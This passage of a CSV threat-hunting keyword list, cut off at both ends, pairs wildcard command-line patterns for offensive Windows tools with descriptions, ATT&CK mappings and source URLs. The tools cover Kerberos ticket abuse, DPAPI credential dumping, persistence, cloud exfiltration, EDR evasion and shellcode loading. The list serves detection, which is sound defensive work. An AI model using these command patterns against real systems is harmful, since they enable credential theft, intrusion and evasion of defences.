2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","0","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" +"*.exe dump /luid:0x5379f2 /nowrap*","offensive_tool_keyword","AD exploitation cheat sheet","Unconstrained delegation Exploitation with Rubeus","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.exe --eventviewer *.exe*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*.exe exec * cmd interactive*","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","0","N/A","10","1","91","11","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z" +"*.exe Get-DomainController -Domain * -Server * -Credential *","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/tevora-threat/SharpView/","1","0","N/A","10","9","850","206","2021-12-17T15:53:20Z","2018-07-24T21:15:04Z" +"*.exe -gettgs -luid:*","offensive_tool_keyword","GIUDA","Ask a TGS on behalf of another user without password","T1558.003 - T1059.003","TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/foxlox/GIUDA","1","0","N/A","9","4","388","50","2023-09-28T15:54:16Z","2023-07-19T15:37:07Z" +"*.exe gmsainfo --sid *","offensive_tool_keyword","GoldenGMSA","GolenGMSA tool for working with GMSA passwords","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/Semperis/GoldenGMSA","1","0","N/A","7","2","113","17","2023-07-03T09:35:48Z","2022-02-03T10:32:05Z" +"*.exe GoogleDrive --appname * --accesstoken * --filepath * --extensions * --memoryonly*","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","0","N/A","10","2","116","26","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z" +"*.exe -group=all *","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","fp risks","N/A","10","3139","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" +"*.exe -group=all -full*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","fp risks","N/A","10","3139","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" +"*.exe -group=remote *","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","fp risks","N/A","10","3139","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" +"*.exe -group=system *","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","fp risks","N/A","10","3139","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" +"*.exe -group=user *","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","fp risks","N/A","10","3139","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" +"*.exe hash /password:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*.exe -i -c powershell.exe*","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","0","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" +"*.exe kdsinfo --guid *","offensive_tool_keyword","GoldenGMSA","GolenGMSA tool for working with GMSA passwords","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/Semperis/GoldenGMSA","1","0","N/A","7","2","113","17","2023-07-03T09:35:48Z","2022-02-03T10:32:05Z" +"*.exe krbscm -c *cmd.exe*","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","10","4","316","58","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z" +"*.exe -l * -c {B91D5831-B1BD-4608-8198-D72E155020F7}*","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","0","N/A","10","8","703","90","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z" +"*.exe -l * -c {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} -a*","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","0","N/A","10","8","703","90","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z" +"*.exe machinetriage*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"*.exe masterkeys /hashes*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"*.exe masterkeys /hashes*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"*.exe monitor /interval:5 /nowrap","offensive_tool_keyword","AD exploitation cheat sheet","Unconstrained delegation Exploitation with Rubeus","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.exe NonstandardProcesses*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3139","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" +"*.exe NTLMSettings*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3139","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" +"*.exe OneDrive --username * --password * --filepath *\*.exe*","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","0","N/A","10","2","116","26","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z" +"*.exe --override-file --source-file *.exe*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" +"*.exe ptt /ticket:*","offensive_tool_keyword","AD exploitation cheat sheet","Unconstrained delegation Exploitation with Rubeus","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.exe -ptt ticket:*.kirbi*","offensive_tool_keyword","GIUDA","Ask a TGS on behalf of another user without password","T1558.003 - T1059.003","TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/foxlox/GIUDA","1","0","N/A","9","4","388","50","2023-09-28T15:54:16Z","2023-07-19T15:37:07Z" +"*.exe --pwsh *.ps1 *.exe*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*.exe -q InterestingProcesses*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3139","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" +"*.exe -q PowerShell*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3139","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" +"*.exe -q WindowsDefender*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3139","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" +"*.exe rbcd -m * -p * -c *cmd.exe*","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","10","4","316","58","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z" +"*.exe --remove-reparse --source-file *.exe*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" +"*.exe -s * -c service_mod *","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" +"*.exe -s *\x*\x*\x*","offensive_tool_keyword","frampton","PE Binary Shellcode Injector - Automated code cave discovery. shellcode injection - ASLR bypass - x86/x64 compatible","T1055 - T1548.002 - T1129 - T1001","TA0002 - TA0003- TA0004 -TA0011","N/A","N/A","POST Exploitation tools","https://github.com/ins1gn1a/Frampton","1","1","N/A","N/A","1","69","16","2019-11-24T22:34:48Z","2019-10-29T00:22:14Z" +"*.exe s4u /ticket:* /impersonateuser:* /msdsspn:* /ptt*","offensive_tool_keyword","AD exploitation cheat sheet","Rubeus Use s4u2self and s4u2proxy to impersonate the DA user to the allowed SPN","T1550 - T1555 - T1212 - T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.exe s4u /user:* /impersonateuser:* /msdsspn:* /altservice:ldap /ptt /rc4*","offensive_tool_keyword","AD exploitation cheat sheet","Rubeus access the LDAP service on the DC (for dcsync)","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.exe --schedule * *.exe*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*.exe --screensaver *:\*.exe*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*.exe Search Find-Persist*","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","0","N/A","10","3","215","39","2023-09-06T09:48:55Z","2022-05-26T19:34:59Z" +"*.exe --set-reparse override --source-file *.exe --target-file *","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" +"*.exe shadowcred -c * -f*","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","10","4","316","58","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z" +"*.exe -sniffer n*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","0","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" +"*.exe --startup *:\*.exe*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*.exe -t startupfolder -c * -a * -f*","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1151","233","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" +"*.exe -t tortoisesvn -c * -a * -m*","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1151","233","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" +"*.exe -t wl-extract.dll -d *.dat -r *.rsa -*.exe*","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/charlesnathansmith/whatlicense","1","0","N/A","6","1","61","5","2023-07-23T03:10:44Z","2023-07-10T11:57:44Z" +"*.exe triage","offensive_tool_keyword","AD exploitation cheat sheet","Unconstrained delegation Exploitation with Rubeus","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.exe triage /password:*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"*.exe -uac","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*.exe --ui *","offensive_tool_keyword","blackcat ransomware","BlackCat Ransomware behavior","T1486.001 - T1489 - T1490 - T1486","TA0011 - TA0010 - TA0012 - TA0007 - TA0040","blackcat ransomware","N/A","Ransomware","https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.exe --winlogon * *:\*.exe*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*.exe --wmi *:\*.exe*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*.exe* -d localhost * -u * -p */24*","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*.exe* -f *.bin -t queueuserapc*","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/f1zm0/hades","1","0","N/A","N/A","3","290","44","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z" +"*.exe* --Filter *rule disable { condition: true }*","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","0","N/A","10","3","240","46","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" +"*.exe* -t queueuserapc*","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/f1zm0/hades","1","0","N/A","N/A","3","290","44","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z" +"*.exe* -t remotethread*","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/f1zm0/hades","1","0","N/A","N/A","3","290","44","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z" +"*.exe* -t selfthread*","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/f1zm0/hades","1","0","N/A","N/A","3","290","44","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z" +"*.exe* --technique queueuserapc*","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/f1zm0/hades","1","0","N/A","N/A","3","290","44","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z" +"*.exe* --technique remotethread*","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/f1zm0/hades","1","0","N/A","N/A","3","290","44","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z" +"*.exe* --technique selfthread*","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/f1zm0/hades","1","0","N/A","N/A","3","290","44","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z" +"*.exe* -u administrator -H :*--shares*","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*.exe*\Terminator.sys*","offensive_tool_keyword","SharpTerminator","Terminate AV/EDR Processes using kernel driver","T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001","TA0007 - TA0008 - TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/mertdas/SharpTerminator","1","0","N/A","N/A","3","266","53","2023-06-12T00:38:54Z","2023-06-11T06:35:51Z" +"*.exec*.interact.sh*","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C4","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","1","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2677","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z" +"*.feeds.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*.files.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 